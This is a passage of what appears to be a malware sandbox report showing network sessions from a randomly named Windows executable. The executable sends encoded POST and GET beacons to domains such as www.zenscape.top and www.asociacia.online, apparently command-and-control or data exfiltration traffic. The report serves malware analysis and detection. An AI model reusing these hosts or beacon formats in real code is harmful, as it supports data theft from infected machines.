                                                      Data Ascii: N0spilI0=/itW34sb01LlHftgAm5jLyJ833yRNT7E7GIjkLfmrop9GXlqnRdo39VBl1b5XsevacqbTupstxanMhrC3xgoo1qP7Kqgxux+lD0WATSQR3zpU5NWWudsCwDc3s3PxonDAECeb2FDUuvnulzkd+I55DzfFeijkHfy0oxdwuxaSAAv8OLtjifbiTpzMQ41qwCO84cWtuSdTxwst7TKesW7F94=
                                                      Sep 25, 2024 05:36:46.967294931 CEST980INHTTP/1.1 404 Not Found
                                                      Date: Wed, 25 Sep 2024 03:36:46 GMT
                                                      Server: Apache
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Length: 774
                                                      X-XSS-Protection: 1; mode=block
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.449748199.192.21.16980600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:36:48.936655045 CEST10832OUTPOST /d8cw/ HTTP/1.1
                                                      Host: www.zenscape.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.zenscape.top
                                                      Referer: http://www.zenscape.top/d8cw/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2f 69 74 57 33 34 73 62 30 31 4c 6c 48 66 74 67 41 6d 35 6a 4c 79 4a 38 33 33 79 52 4e 54 37 45 37 47 49 6a 6b 4c 66 6d 72 6f 68 39 46 6b 39 71 31 69 46 6f 34 64 56 42 73 56 62 34 58 73 65 32 61 63 79 6c 54 76 55 5a 74 33 57 6e 44 6a 54 43 67 51 67 6f 69 31 71 50 32 71 71 74 75 65 78 52 6c 44 6b 53 41 54 43 51 52 33 7a 70 55 37 56 57 41 50 64 73 41 77 44 66 6e 4d 32 4f 36 49 6e 6e 41 45 36 4f 62 33 45 30 58 66 50 6e 75 46 6a 6b 66 4d 67 35 78 44 7a 64 43 65 69 72 6b 48 53 77 30 6f 74 52 77 75 6f 50 53 48 6f 76 32 4c 4b 53 37 44 7a 54 31 79 35 51 54 51 63 6d 79 52 71 30 32 4a 4d 63 71 38 4b 37 4e 46 6f 43 75 72 47 59 43 75 36 42 61 64 39 51 41 41 67 37 54 4e 52 71 62 39 4b 47 6e 62 50 68 59 6c 76 64 67 38 47 54 42 78 38 5a 56 52 76 37 7a 30 79 54 69 69 32 48 53 45 46 45 75 71 58 6b 62 37 56 70 6c 77 4e 74 6b 76 4c 2b 48 6a 52 4b 36 4c 70 76 6a 51 56 30 70 74 54 48 42 5a 42 45 43 5a 79 59 70 4d 4d 39 53 31 51 39 71 4e 33 4d 6b 4f 63 41 63 32 2b 54 56 72 58 37 49 76 36 41 74 [TRUNCATED]
                                                      Data Ascii: N0spilI0=/itW34sb01LlHftgAm5jLyJ833yRNT7E7GIjkLfmroh9Fk9q1iFo4dVBsVb4Xse2acylTvUZt3WnDjTCgQgoi1qP2qqtuexRlDkSATCQR3zpU7VWAPdsAwDfnM2O6InnAE6Ob3E0XfPnuFjkfMg5xDzdCeirkHSw0otRwuoPSHov2LKS7DzT1y5QTQcmyRq02JMcq8K7NFoCurGYCu6Bad9QAAg7TNRqb9KGnbPhYlvdg8GTBx8ZVRv7z0yTii2HSEFEuqXkb7VplwNtkvL+HjRK6LpvjQV0ptTHBZBECZyYpMM9S1Q9qN3MkOcAc2+TVrX7Iv6AtKsEImsQtglOJjbaNYn28+/W0IeJrG38w6VhrPfY4SAI8D0dH1fzwzUASpwak9dKQ1MkBrcRCkb4tL7NcMnC9YAe0T15Bx74iKVoIREzgqT9LZ8uIqwJfsApv8z6MXqgjePNbjZvhQaHegNgpplpOjOUYtcxkv5qVXIY8nuPLwDzT7iexRfsuy6+MNlvNSH85zjgD9WJIf5UFswIUd7kezColGkJLGwtRJJh/e+CGc4969dW0XrLx79vUcrNxMXXHYdTFex09p9gWrBJyx8Qm5e2M6JHkg69XSY78Ves/26N4+Xh6pUF9ZfUlHIOCS1aR5sgDucO4NYxqTv7pxN2Ag0qg+noD1p8DtXTmPglgr3wLaWAWD7sPTcpUY+mj8n2T0sVM7zIr/al/QDcM8cIVoiHBoV9NKgzJKq3HlmUsvOYoNdEPXyMEnh3knCKAwCUXtMD8MUhF2SVGyhkpCcCdpVEMSxS5mbLsiX1xE77sM7l/f1MFLtbUqrNRT/YywvpE1wWlAwRx17osSxcPmVuuKd8PVbkQeE5Fn4n2gMiHCQxcyIpKOnfhTzuvePnexueUmtLH5VV2FJ9508C0O5sbRlyqegMj00sa6l9oS7PSLzqqliAASAJcHU5e+uRey69gsQRzaf/ychMY/kZ01UweQ9CnYsQNHqJAsj [TRUNCATED]
                                                      Sep 25, 2024 05:36:49.520350933 CEST980INHTTP/1.1 404 Not Found
                                                      Date: Wed, 25 Sep 2024 03:36:49 GMT
                                                      Server: Apache
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Length: 774
                                                      X-XSS-Protection: 1; mode=block
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.449749199.192.21.16980600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:36:51.484142065 CEST470OUTGET /d8cw/?N0spilI0=ygF20N1+ik7kBOtGb3g4TwN9wkqIIRiR8XEst5j0lvkfFXMCnxh1w4hdkVa8euGiR7K2W9wNoXO2NDH8py5ookWv7InHpo4AkD1QDiauZEraAIYQUMRDKnI=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.zenscape.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:36:52.085654974 CEST995INHTTP/1.1 404 Not Found
                                                      Date: Wed, 25 Sep 2024 03:36:51 GMT
                                                      Server: Apache
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Length: 774
                                                      X-XSS-Protection: 1; mode=block
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.44975081.2.196.1980600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:36:57.255444050 CEST742OUTPOST /jsqu/ HTTP/1.1
                                                      Host: www.asociacia.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.asociacia.online
                                                      Referer: http://www.asociacia.online/jsqu/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 75 34 68 6d 5a 66 74 6c 58 43 78 34 67 6a 38 6d 38 35 68 4d 76 4d 6d 47 7a 30 7a 4e 57 77 56 46 6c 77 33 48 47 30 45 53 6e 47 69 72 44 56 63 61 4e 5a 77 47 4c 4f 71 74 56 6c 63 56 44 70 35 79 52 48 7a 2b 2b 63 2f 37 51 73 4e 64 56 73 35 6d 49 4c 66 6c 4c 58 53 59 5a 59 48 41 62 45 68 6e 72 56 59 66 4d 55 74 49 49 44 77 7a 63 4f 31 49 6e 4e 48 72 6c 66 4b 38 34 39 61 39 49 34 39 68 4b 39 2f 78 39 61 55 6e 30 49 46 66 48 4d 72 37 67 2f 30 56 42 30 6d 76 61 50 5a 76 75 4c 4f 53 41 6f 7a 6a 2f 61 4d 6b 54 79 72 36 79 52 44 75 51 54 35 38 79 65 57 34 50 34 75 4e 49 66 7a 65 6c 41 3d 3d
                                                      Data Ascii: N0spilI0=u4hmZftlXCx4gj8m85hMvMmGz0zNWwVFlw3HG0ESnGirDVcaNZwGLOqtVlcVDp5yRHz++c/7QsNdVs5mILflLXSYZYHAbEhnrVYfMUtIIDwzcO1InNHrlfK849a9I49hK9/x9aUn0IFfHMr7g/0VB0mvaPZvuLOSAozj/aMkTyr6yRDuQT58yeW4P4uNIfzelA==
                                                      Sep 25, 2024 05:36:57.915932894 CEST355INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:36:57 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.44975181.2.196.1980600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:36:59.912911892 CEST762OUTPOST /jsqu/ HTTP/1.1
                                                      Host: www.asociacia.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.asociacia.online
                                                      Referer: http://www.asociacia.online/jsqu/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 75 34 68 6d 5a 66 74 6c 58 43 78 34 68 43 73 6d 7a 2b 4e 4d 6b 4d 6d 46 32 30 7a 4e 59 51 55 4d 6c 77 37 48 47 31 42 50 79 67 36 72 41 30 73 61 63 6f 77 47 59 2b 71 74 4e 56 63 51 4d 4a 35 35 52 48 50 4d 2b 64 54 37 51 74 70 64 56 70 56 6d 49 34 33 6b 5a 33 53 65 55 34 48 43 55 6b 68 6e 72 56 59 66 4d 55 49 6e 49 48 55 7a 64 2b 46 49 6e 76 76 73 37 50 4b 39 39 39 61 39 5a 6f 39 74 4b 39 2f 48 39 61 6c 4d 30 4f 42 66 48 4a 76 37 67 71 59 57 59 45 6d 74 46 66 59 36 6c 2b 72 72 49 34 53 7a 34 6f 55 44 54 67 76 70 7a 58 53 30 42 69 59 72 67 65 79 4c 53 2f 6e 35 46 63 4f 58 2b 4e 69 7a 39 6b 61 41 55 39 2f 4f 74 6c 63 36 77 75 61 48 74 33 77 3d
                                                      Data Ascii: N0spilI0=u4hmZftlXCx4hCsmz+NMkMmF20zNYQUMlw7HG1BPyg6rA0sacowGY+qtNVcQMJ55RHPM+dT7QtpdVpVmI43kZ3SeU4HCUkhnrVYfMUInIHUzd+FInvvs7PK999a9Zo9tK9/H9alM0OBfHJv7gqYWYEmtFfY6l+rrI4Sz4oUDTgvpzXS0BiYrgeyLS/n5FcOX+Niz9kaAU9/Otlc6wuaHt3w=
                                                      Sep 25, 2024 05:37:00.549154043 CEST355INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:37:00 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.44975281.2.196.1980600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:02.669400930 CEST10844OUTPOST /jsqu/ HTTP/1.1
                                                      Host: www.asociacia.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.asociacia.online
                                                      Referer: http://www.asociacia.online/jsqu/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 75 34 68 6d 5a 66 74 6c 58 43 78 34 68 43 73 6d 7a 2b 4e 4d 6b 4d 6d 46 32 30 7a 4e 59 51 55 4d 6c 77 37 48 47 31 42 50 79 67 79 72 44 43 34 61 4f 37 49 47 4a 4f 71 74 54 6c 63 52 4d 4a 35 67 52 48 6e 79 2b 64 4f 4d 51 75 42 64 55 50 42 6d 4f 4e 4c 6b 41 48 53 65 4c 6f 48 48 62 45 68 32 72 55 30 41 4d 55 34 6e 49 48 55 7a 64 34 42 49 75 64 48 73 35 50 4b 38 34 39 61 50 49 34 39 42 4b 39 6e 58 39 65 34 33 31 2f 39 66 47 70 66 37 6c 59 67 57 51 45 6d 7a 47 66 5a 35 6c 2b 76 4b 49 37 32 2f 34 70 67 35 54 69 7a 70 33 42 6a 71 65 47 51 4b 2b 73 71 76 53 2b 6e 41 4e 38 65 75 7a 73 65 32 77 52 2f 56 57 35 33 61 75 6e 52 74 68 75 61 5a 2f 54 2f 47 6b 6c 61 52 72 34 6f 63 35 7a 36 5a 5a 49 33 57 57 38 4f 72 56 75 73 32 4e 72 35 52 6d 51 54 73 50 41 55 63 33 75 44 32 78 2b 56 50 5a 72 55 6b 39 74 6c 30 2b 5a 6c 4d 78 58 61 39 69 72 63 53 4c 2b 69 61 76 64 5a 66 35 45 37 56 57 35 59 44 56 66 4b 39 78 59 67 51 35 41 65 6d 70 75 55 66 6d 74 36 34 50 6e 56 64 2f 54 7a 51 63 33 79 30 6a [TRUNCATED]
                                                      Data Ascii: N0spilI0=u4hmZftlXCx4hCsmz+NMkMmF20zNYQUMlw7HG1BPygyrDC4aO7IGJOqtTlcRMJ5gRHny+dOMQuBdUPBmONLkAHSeLoHHbEh2rU0AMU4nIHUzd4BIudHs5PK849aPI49BK9nX9e431/9fGpf7lYgWQEmzGfZ5l+vKI72/4pg5Tizp3BjqeGQK+sqvS+nAN8euzse2wR/VW53aunRthuaZ/T/GklaRr4oc5z6ZZI3WW8OrVus2Nr5RmQTsPAUc3uD2x+VPZrUk9tl0+ZlMxXa9ircSL+iavdZf5E7VW5YDVfK9xYgQ5AempuUfmt64PnVd/TzQc3y0jJbdYnSOkzxZf0v0zASCQFnwzZ4IUou2EVjY2I4bclPj1p/A2CaK2W3w/o8JVUkJP1VMlGiDZ9iIBY+F0pZaneQSkpBlHE/zuCQlOB2zsJavF86zoN5O8KvPCqMxbbGCE2NPT/2nflMskTwPQLrAKUqqZKYAx2TIZ5hwZps17fK/wwx2/7YIsMIOkth1kXOE75TSCfI5SrtwobD9YeTlrQbi2hm4vcQvyVw5VWGv3W8Z175FGXtZv+KjPXdiHTVkMQmfMQISThkQQ8neATLwiuh9AdWs7pDjjYnBOUSCVkOUMi88w6faWC1X/E+DkTKXkEUU9Jq5ONpTLnB9ajbszPHy0iYJXCh0tMY5TKJqtZRF7sRIIASMhRuTK8bbezcB2vsduyblvHxvH1m993XCpNKA0JuDBwDl3n1c5xKtyhqqxYS0/W+60QZN+rk5HJ1fpiOjeFGi2TWpBG0dYwFtjQB8RlLXoA9BT+y+qDrD6SR33EMlLLc9gvMInQl1gld+/6Uld/NwwKx+0Xq7t372lM1aj0HwfIVVUW/EBNRYXgrRvC+uCdtUWVG2t//aHNe714Qcsrb6l6HYQ1HF0Yo1323ANWs5aGcrQO72Mq0PyYqz56/4Avm3HZpDMbAnCJoI61BKo76d7xsIpcdZHrTQ4cgBMS5GtD+Ki+e [TRUNCATED]
                                                      Sep 25, 2024 05:37:03.334024906 CEST355INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:37:03 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.44975381.2.196.1980600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:37:05.216430902 CEST474OUTGET /jsqu/?Vvn=XtJLE6KXyHJ010P&N0spilI0=j6JGavFFAQYaoSsj7sdzjfOI2Rr+bAZS/zrFTn0tpA7YEGIVc6EsUszyewNJDeJ1aRTf+dmReaRifudBLpLuFGiuWviWU248lx4BGGAWHhQeP+58vPv3y+I= HTTP/1.1
                                                      Host: www.asociacia.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:37:05.871893883 CEST691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 25 Sep 2024 03:37:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
